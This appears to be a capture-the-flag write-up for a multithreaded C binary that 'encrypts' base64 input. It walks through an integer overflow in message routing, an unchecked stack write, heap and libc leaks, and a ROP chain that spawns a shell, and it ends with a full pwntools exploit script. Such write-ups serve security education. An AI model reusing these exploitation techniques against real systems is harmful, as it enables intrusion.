In this challenge, we have to exploit a multithreaded program that “encrypts” our inputs. This program is made of multiple thread communicating with each other through a messaging system. An integer overflow in one of these threads allows sending unexpected messages to other threads. Using this primitive, I was able to leak a heap address, then a libc address thanks to a race condition, and finally to ROP in one of the threads to obtain a shell.
Setup
We are given the compiled binary, its source code, and a docker setup. First thing to do is to get a debug setup as close as possible to the remote, by retrieving the libc and ld files from the docker and patching the executable:
docker compose up -d
docker cp swift-encryptor-swift-encryptor-1:/lib/x86_64-linux-gnu/libc.so.6 .
docker cp swift-encryptor-swift-encryptor-1:/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 .
cp swift-encryptor patched
patchelf --set-rpath . ./patched
patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./patched
chmod u+x patched ld-linux-x86-64.so.2
We can now run the patched binary with the right libc and ld. When we try to debug the program, however, GDB tells us:
warning: Expected absolute pathname for libpthread in the inferior, but got ./libc.so.6.
warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available.
Since the program is multithreaded, it would be great to be able to debug the threads. So we retrieve libthread_db.so.1 from the docker, the same way as we did for libc and ld, and then let GDB load it with
set libthread-db-search-path .
And now the debugging of threads works.
Analyzing the program
We start playing with the program to observe its behavior:
$ ./patched
ββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββ βββββ βββββββ ββββββββββββββ
βββββββββββ β ββββ ββ βββββββββ β β βββββ
βββββββββ β ββββ βββββ β β β β ββββ ββ
ββββββββββββββββββββββββββββββββββββββββββββ
> hello
[interface] OK
[decoder] Invalid base64
> AAAA
[interface] OK
[decoder] OK
[splitter] OK
[joiner] OK
[encoder] Xl/DPbknb27Y1c7rHg51jQ==
>
Looks like the program expects a base64-encoded message, and returns another base64-encoded message, apparently meaningless. Let’s have a look at the source code. I was afraid it would be coded in Swift (hinted from the name of the challenge), but hopefully it’s good old C.
main.c
The main is very short, it makes the I/O unbuffered, runs a command with system, then creates some threads, waits for the interface thread to join, and finally destroys all threads and exits. Not much to see here. Let’s see how the threads are managed.
thread.c
This file defines functions for creating and destroying threads, and for passing messages between the threads. We notice that the created threads are stored in two arrays: a static array MAIN_THREADS, holding the “interface”, “decoder”, “splitter”, “joiner” and “encoder” threads, and a dynamic array WORKERS, storing the other threads. Every thread is identified by an id, with MAIN_THREADS holding the threads with id 0 to 4 and WORKERS holding the rest.
interface.c
The interface thread reads an input from the stdin, sends it to the decoder, and then prints messages received from other threads, until it receives a message starting with \x01, at which point it goes back to the beginning and prompts the user again for an input. We can see that the maximum message size is 0x4000, let’s have a look at what happens if we send a large input:
$ python -c "print('A'*0x3000)" | ./patched
ββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββ βββββ βββββββ ββββββββββββββ
βββββββββββ β ββββ ββ βββββββββ β β βββββ
βββββββββ β ββββ βββββ β β β β ββββ ββ
ββββββββββββββββββββββββββββββββββββββββββββ
> [interface] OK
[decoder] OK
[splitter]
[splitter]
[splitter] OK
Interesting, we receive several empty messages from the splitter, and then the program hangs… We’ll keep that in mind.
decoder.c
The decoder performs a base64 decoding of the input received from the interface. I did not want to audit the base64 code, so I just assumed it was correct, and hoped I would find a bug somewhere else. If the decoding succeeds, the decoder acknowledges to the interface and send the decoded result to the splitter.
splitter.c
Here it becomes interesting.
When the splitter receives the input from the decoder, it kills any remaining encryptor or joiner thread, then creates a new joiner thread and as many encryptors (stored in WORKERS) as there are 0x10-blocks in the input. It then sends each block to a different encryptor, and acknowledges to the interface.
We notice a vulnerability in this code: there can be up to 0x4000//0x10 = 0x400 workers, but the dst field of message is a u_char, so it can be at most 0xff. We thus have an integer overflow, leading to the input blocks starting from 0x100 being sent to the wrong thread. This explains why the interface received blank messages from the splitter when the input was too long: it simply received messages destined to the workers 0x100 and 0x200. That’s very interesting, this vulnerability should allow us to send arbitrary messages to any thread. We’ll keep that in mind for later.
encryptor.c
The encryptor is simple, it “encrypts” the chunk received from the splitter, then sends the result to the joiner. We notice that it prefixes the encrypted block by its index in a u_short, thus identifying the offset of the block within the message. The encryption is simply a XOR with a static key.
joiner.c
First red flag, the joiner allocates a buffer on the stack with alloca.
It does not seem to be exploitable for an int overflow, because the size of the allocation is controlled by the worker count, itself based on the size of the input.
The joiner receives chunks of encrypted data from the workers, and places them in its stack buffer, based on the offset read from the message, and without any bound check. That’s very interesting, it means that, by sending a crafted message with an invalid offset, we could write a chunk of 0xe (0x10-2) bytes to any 0x10-aligned offset in the stack.
Once the joiner has collected as many chunks as there are workers, it acknowledges to the interface, then sends the full encrypted message to the encoder.
encoder.c
The encoder performs a base64 encoding of the messages received from the joiner, and sends the result to the interface. Once again, I was too lazy to audit the base64 encoding code itself. We notice that the size of the message to encode is read from the message itself, which could lead to weird behaviors if the encoder receives a malformed message.
Recap
That was a lot of a code, all of this for a simple XOR encryption… I drew a figure to schematize the functioning of the program. The joiner and workers threads are dashed to indicate that they are created and destroyed by the splitter, in opposition with the other threads, which live during the entire run.
And we noticed the following points:
- the
dstof messages sent from the joiner to the workers overflows if the input size is greater than 0x1000 - this allows us to send 0x10-long messages to any thread
- when the joiner receives a chunk, it does not do any bound checks on its offset and writes it to its stack
- when the encoder receives a message, it trusts the indicated size of the message
Now, time to pwn!
Exploit
Controlling RIP
The unchecked offset in the joiner thread should allow us to get code execution through ROP. Let’s try this out!
Looking at the stack in GDB, I found that writing a chunk at offset workers_count + 6 in the joiner should smash the saved rbp and saved rip. So, I wrote some helpers to send and receive the data, and then I wrote a joiner_write function to build a payload allowing to send our forged message to the joiner.
In order to send a message to the joiner, we have to also send one to the interface, decoder and splitter, because their index is lower as the one of the decoder. We make sure these messages are innocuous :
- the interface simply prints what it receives, we can send anything
- we begin the decoder’s message with a null byte, so that
enc_sizeis 0 and the decoder does not do anything - we begin the splitter’s message with two null bytes, so that
data_sizeis 0 and the splitter does not do anything
I used this function to overwrite the return address with 0xdeadbeef, and tried it, but the program just hung. I quickly understood why: when we use the integer overflow in the splitter, a few messages will not be sent to the workers (because they are sent to other threads), and the joiner will not receive enough messages from the workers. Thus, the joined_count == WORKERS_COUNT condition will never be satisfied in the joiner, and the joiner will not return.
Fortunately, I found a solution: if we place \x01 at the beginning of the message for the interface, the interface will believe it is the final message from the encoder, and will thus offer us to encrypt a new string. Sending a random base64 string will cause the splitter to terminate the currently running joiner by setting its stop field to 1, thus making the joiner return. I modified my joiner_write function in order to be able to send the right message to the interface, and got it to segfault.
Getting leaks
Great, we can jump anywhere, but where do we want to jump? We need to leak some addresses. To obtain a first leak, I used a forged message to the encoder. The encoder reads the first two bytes of a message to know its size, so by sending a message to the encoder with a large size, we can dump whatever is in memory after the message. Let’s try it out:
[DEBUG] Receiving :
00000000 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 βDDDDβDDDDβDDDDβDDΒ·Β·β
00000010 00 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 βΒ·Β·Β·Β·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β5Β·Β·Β·β
00000020 00 00 00 00 1b 80 73 90 07 00 00 00 0d ed a0 99 βΒ·Β·Β·Β·βΒ·Β·sΒ·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β
00000030 94 ce a6 3d 41 41 41 41 41 41 41 41 41 41 00 00 βΒ·Β·Β·=βAAAAβAAAAβAAΒ·Β·β
00000040 00 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 βΒ·Β·Β·Β·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β5Β·Β·Β·β
00000050 00 00 00 00 9b 38 72 a8 00 79 00 00 0d ed a0 99 βΒ·Β·Β·Β·βΒ·8rΒ·βΒ·yΒ·Β·βΒ·Β·Β·Β·β
00000060 94 ce a6 3d 41 41 41 41 41 41 41 41 41 41 00 00 βΒ·Β·Β·=βAAAAβAAAAβAAΒ·Β·β
00000070 00 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 βΒ·Β·Β·Β·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β5Β·Β·Β·β
00000080 00 00 00 00 eb 3c 72 a8 00 79 00 00 0d ed a0 99 βΒ·Β·Β·Β·βΒ·<rΒ·βΒ·yΒ·Β·βΒ·Β·Β·Β·β
00000090 94 ce a6 3d 41 41 41 41 41 41 41 41 41 41 00 00 βΒ·Β·Β·=βAAAAβAAAAβAAΒ·Β·β
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 βΒ·Β·Β·Β·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β5Β·Β·Β·β
000000b0 00 00 00 00 9b 37 72 a8 00 79 00 00 02 f9 41 41 βΒ·Β·Β·Β·βΒ·7rΒ·βΒ·yΒ·Β·βΒ·Β·AAβ
000000c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 βAAAAβAAAAβAAAAβAAΒ·Β·β
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 βΒ·Β·Β·Β·βΒ·Β·Β·Β·βΒ·Β·Β·Β·β5Β·Β·Β·β
000000e0 00 00 00 00 9b 35 72 a8 00 79 00 00 0d ed a0 99 βΒ·Β·Β·Β·βΒ·5rΒ·βΒ·yΒ·Β·βΒ·Β·Β·Β·β
It looks like a heap, with chunk sizes, Safe-Linking-protected forward pointers, and tcache keys.
In GDB, we can see that this heap is not in the usual heap region, but in a mmaped area. This is confirmed by the chunk sizes, which have the NON_MAIN_ARENA flag set. This is probably due to the multithreading situation, where the threads create their own heap to avoid locks on the main heap.
We can get the address of this heap by finding a place where the NULL pointer is protected by Safe-Linking, in this example this is 1b 80 73 90 07 00 00 00 at offset 0x24. The existence and position of such a leak depends on the order in which the messages were sent and freed, which is random due to multithreading, so we perform this leak several times until we find it. We thus have the address of a mmaped heap.
Leaking libc
We now want to get the address of the libc. Unfortunately, it seems that this heap does not contain any pointer to the libc, so we’ll have to find another way.
Idea 1: offset from the heap
My first thought was that both this heap and the libc are mmaped, so they can not be far away. Let’s have a look at it in GDB:
0x00007dba0c000000 0x00007dba0c021000 0x0000000000021000 0x0000000000000000 rw-
0x00007dba0c021000 0x00007dba10000000 0x0000000003fdf000 0x0000000000000000 ---
0x00007dba10000000 0x00007dba10021000 0x0000000000021000 0x0000000000000000 rw-
0x00007dba10021000 0x00007dba14000000 0x0000000003fdf000 0x0000000000000000 ---
0x00007dba147fa000 0x00007dba147fb000 0x0000000000001000 0x0000000000000000 ---
0x00007dba147fb000 0x00007dba14ffb000 0x0000000000800000 0x0000000000000000 rw-
0x00007dba14ffb000 0x00007dba14ffc000 0x0000000000001000 0x0000000000000000 ---
0x00007dba14ffc000 0x00007dba157fc000 0x0000000000800000 0x0000000000000000 rw- <tls-th7><stack-th7>
0x00007dba157fc000 0x00007dba157fd000 0x0000000000001000 0x0000000000000000 ---
0x00007dba157fd000 0x00007dba15ffd000 0x0000000000800000 0x0000000000000000 rw- <tls-th8><stack-th8>
0x00007dba15ffd000 0x00007dba15ffe000 0x0000000000001000 0x0000000000000000 ---
0x00007dba15ffe000 0x00007dba167fe000 0x0000000000800000 0x0000000000000000 rw- <tls-th9><stack-th9>
0x00007dba167fe000 0x00007dba167ff000 0x0000000000001000 0x0000000000000000 ---
0x00007dba167ff000 0x00007dba16fff000 0x0000000000800000 0x0000000000000000 rw- <tls-th10><stack-th10>
0x00007dba16fff000 0x00007dba17000000 0x0000000000001000 0x0000000000000000 ---
0x00007dba17000000 0x00007dba17800000 0x0000000000800000 0x0000000000000000 rw- <tls-th11><stack-th11> <- $rdi, $r14, $r15
0x00007dba17800000 0x00007dba17828000 0x0000000000028000 0x0000000000000000 r-- ./libc.so.6
Here, the first line is our leaked heap, the last is libc. They are indeed quite close, in between we find a second heap and the stack of some threads, all of them interleaved with guard pages. Unfortunately, the number of thread stacks is not consistent across executions, and there is a blank space of a random size between the second heap and the thread stacks. We could solve this with a bit of bruteforce, but it did not seem to succeed.
Idea 2: stack of joiner
Looking at the joiner, we notice that it sends total_size of data to the encoder, where total_size is a local variable, so I thought I could use my stack-smashing primitive to increase it, and make the joiner leak what is after its buffer. This would require satisfying the joiner_count == WORKERS_COUNT condition despite the missing messages, but joiner_count is a local variable too, so we could overwrite it too in order to satisfy the condition. To study the feasibility of this, I read the disassembly of the function and drew a representation of its stack on paper. Here is a numerical version of my drawing:
We overwrite by chunks of 0xe with a 0x10 alignment, since the first two bytes of a message correspond to the offset at which we write, so we can overwrite joined_count and total_size simultaneously. This would also smash thread, but it is not used anymore once the joiner_count == WORKERS_COUNT is satisfied, so we can write overwrite it without problems. I did this overwrite with the right joined_count and a big total_size… but did not obtain any leak, and instead got the exact same about of byte that I input, as if I did not overwrite total_size. So I read the source code again, and noticed a line that I missed before:
if (joined_count == WORKERS_COUNT) {
s_msg = create_msg(TID_JOINER, TID_INTERFACE, sizeof(OKMSG)+2);
s_msg->data[0] = 0;
strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
send_msg(s_msg);
total_size = WORKERS_COUNT * BLOCK_SIZE;
s_msg = create_msg(TID_JOINER, TID_ENCODER, total_size+2);
*((u_short*)s_msg->data) = total_size;
memcpy(s_msg->data+2, join_buf, total_size);
send_msg(s_msg);
return NULL;
}
total_size is computed again before sending the message, making my overwrite useless…
Idea 3: overwrite join_buffer
However, trying this gave me a new idea: I could overwrite the join_buffer on the stack to make it point somewhere else. There was a second heap right after the one I leaked, and I found a libc pointer in it at a fixed offset, so this could be a good target.
Overwriting join_buffer forces us to also overwrite r_msg, but we can set it to 0 so that free does not complain. However, if we overwrite join_buffer, the next chunks will be written to the new location instead of the stack, and we do not have control over the local variables anymore. In particular, we can not satisfy joiner_count == WORKERS_COUNT anymore. So we have to modify joiner_count first and make it bigger, so that we can exit even if not all messages have been received, but not to big in order to receive the message that overwrites join_buffer. This is a race, and I managed to make it sometimes work, thus successfully leaking a libc address.
Putting it together
Now that we have a libc leak, we can smash the stack as we POCed before, but this time with a ROP payload, and we get a shell. This required a few attempts in order to win the race, but it eventually succeeded and gave me a flag.
Final exploit
#!/usr/bin/python3
from pwn import *
HOST = "chall.fcsc.fr"
PORT = 2104
vuln = ELF("./patched")
context.binary = vuln
libc = ELF("./libc.so.6")
POP_RDI = 0x10f75b
POP_RSI = 0x110a4d
KEY = b"\x5e\x5f\xc3\x3d\xb9\x27\x6f\x6e\xd8\xd5\xce\xeb\x1e\x0e\x75\x8d"
def start():
global p
if args.REMOTE:
p = remote(HOST, PORT)
elif args.DOCKER:
p = remote("localhost", 4000)
else:
p = process("./patched")
def send(payload:bytes):
p.recvuntil(b"> ")
p.sendline(payload)
def send_encode(payload:bytes):
debug("Sending :")
log.maybe_hexdump(payload, level=logging.DEBUG)
send(b64e(payload).encode())
def recv():
head = p.recvuntil(b"[encoder] ", timeout=0.1)
if not head.endswith(b"[encoder] "):
raise EOFError
res = p.recvline(keepends=False)
return res
def recv_decode():
res = b64d(recv())
debug("Receiving :")
log.maybe_hexdump(res, level=logging.DEBUG)
return res
def leak():
#leak stuff thanks to the encoder
payload = b""
#feed all workers
payload += 0x10*b"A"*(0x100-5)
#msg for interface, first byte == 0x01 if exit loop
payload += 0x10*b"B"
#msg for decoder, make it null to prevent breaking anything
payload += 0x10*b"\0"
#msg for splitter, make it size 0 to prevent breaking anything
payload += 0x10*b"\0"
#msg for joiner, something innocuous
offset = 0
payload += p16(offset) + 14*b"C"
#msg for encoder, leak stuff
leak_size = 0x2000
payload += p16(leak_size) + 14*b"D"
assert len(payload) %0x10 == 0
send_encode(payload)
leak = recv_decode()
assert leak[:14] == 14*b"D"
idx = 0x24
ptr = 0
while idx < leak_size:
mangled_ptr = u64(leak[idx:idx+8])
if mangled_ptr:
if mangled_ptr & 0xfffffffff == mangled_ptr:
ptr = mangled_ptr << 12
break
idx += 0x30
if not ptr:
debug("Did not find suitable leak")
return 0
#info(f"leaked pointer: {ptr:#x}")
if ptr & 0xffff00000000 == 0:
return 0
return ptr
def joiner_write(offset:int, small_payload:bytes, interface_msg=0x10*b"\x01"):
assert len(small_payload) == 0x10 - 2
payload = b""
workers_count = 0x100 - 5 + 4
#feed all workers
payload += 0x10*b"A"*(0x100-5)
#msg for interface, first byte == 0x01 if exit loop
payload += interface_msg
#msg for decoder, make it null to prevent breaking anything
payload += 0x10*b"\0"
#msg for splitter, make it size 0 to prevent breaking anything
payload += 0x10*b"\0"
#msg for joiner, write on stack
offset = workers_count + offset
payload += p16(offset) + small_payload
assert len(payload) %0x10 == 0
assert len(payload) // 0x10 == workers_count
send_encode(payload)
def poc_codexec():
start()
joiner_write(6, 8*b"A" + pack(0xdeadbeef, 6*8), 0x10*b"\x01")
p.recvuntil(b">")
pause()
p.sendline(b"AAAA")
p.interactive()
def write_ropchain(rop_chain:list[int], idx, terminate=False):
assert len(rop_chain)%2 == 0
iterations = len(rop_chain)//2
workers_count = 0x100 * iterations - 1
payload = b""
for i in range(iterations):
small_payload = p64(rop_chain[2*i]) + pack(rop_chain[2*i+1], 6*8)
if terminate and i == iterations - 1:
interface_msg = 0x10*b"\x01"
else:
interface_msg = 0x10*b"B"
#feed all workers
payload += 0x10*b"A"*(0x100-5)
#msg for interface, first byte == 0x01 if exit loop
payload += interface_msg
#msg for decoder, make it null to prevent breaking anything
payload += 0x10*b"\0"
#msg for splitter, make it size 0 to prevent breaking anything
payload += 0x10*b"\0"
#msg for joiner, write on stack
offset = workers_count + idx + i
payload += p16(offset) + small_payload
if i != iterations - 1:
#message for encoder, size 0 to prevent breaking anything
payload += 0x10*b"\0"
assert len(payload) %0x10 == 0
assert len(payload) // 0x10 == workers_count
send_encode(payload)
def attack(cheat=False):
start()
ptr = 0
while not ptr:
#pause()
ptr = leak()
print(f"{ptr:#x}")
assert ptr & 0xf00000 == 0
ptr_low = ptr & 0xff000
ptr_base = ptr & 0xffffff000000
info(f"{ptr_base=:#x}")
thread_addr = ptr_base + 0x1ee0
ptr = ptr_base
ptr += 0x21000
ptr += 0x0000000003fdf000
info(f"Big chunk start @ {ptr:#x}")
#move join_buffer to chunk
#race to leak libc: overwrite joined_count and join_buffer
stack_content = [
0x1f8, #joined_count, needs tuning
thread_addr, #&thread, must be preserved to receive messages
ptr + 0x8a0, #libc leak in the heap
0, #r_msg, set to 0 so free does not complain
]
#pause()
#joiner_write(4, p64(ptr + 0x8a0) + 6*b"\0", 0x10*b"B")
write_ropchain(stack_content, 3)
#joiner_write(3, p64(0x100-5+4-0) + 6*b"\0")
mb_leak = recv_decode()
libc_addr = u64(mb_leak[:8])
if libc_addr & 0xffffffffffff != libc_addr:
error(f"{libc_addr:#x} does not look like a libc addr...")
libc.address = libc_addr - 0x203ac0
"""
if cheat:
libc.address = int(input("Please give libc: "), 16)
else:
#bf
if args.REMOTE:
offset = 0xa7eb000
elif args.DOCKER:
offset = 0xa7eb000
else:
offset = 0xda00000
libc.address = ptr_base + offset
"""
info(f"libc @ {libc.address:#x}")
#pause()
rop_chain = [
0xdeadbeef, #rbp
libc.address + POP_RDI,
next(libc.search(b"/bin/sh")),
libc.address + POP_RSI,
0,
libc.symbols["execv"]
]
#rop_chain = [0xdeadbeef for _ in range(6)]
write_ropchain(rop_chain, 6, True)
p.recvuntil(b"\n> ")
p.sendline(b"aaaa")
p.recvuntil(b"[decoder] OK\n")
p.sendline(b"cat flag.txt")
flag = p.recvline(keepends=False).decode()
info(flag)
p.interactive()
p.close()
def attack_bf():
while True:
try:
attack()
print("Attack succeeded!")
return
except (EOFError, PwnlibException):
p.close()
attack_bf()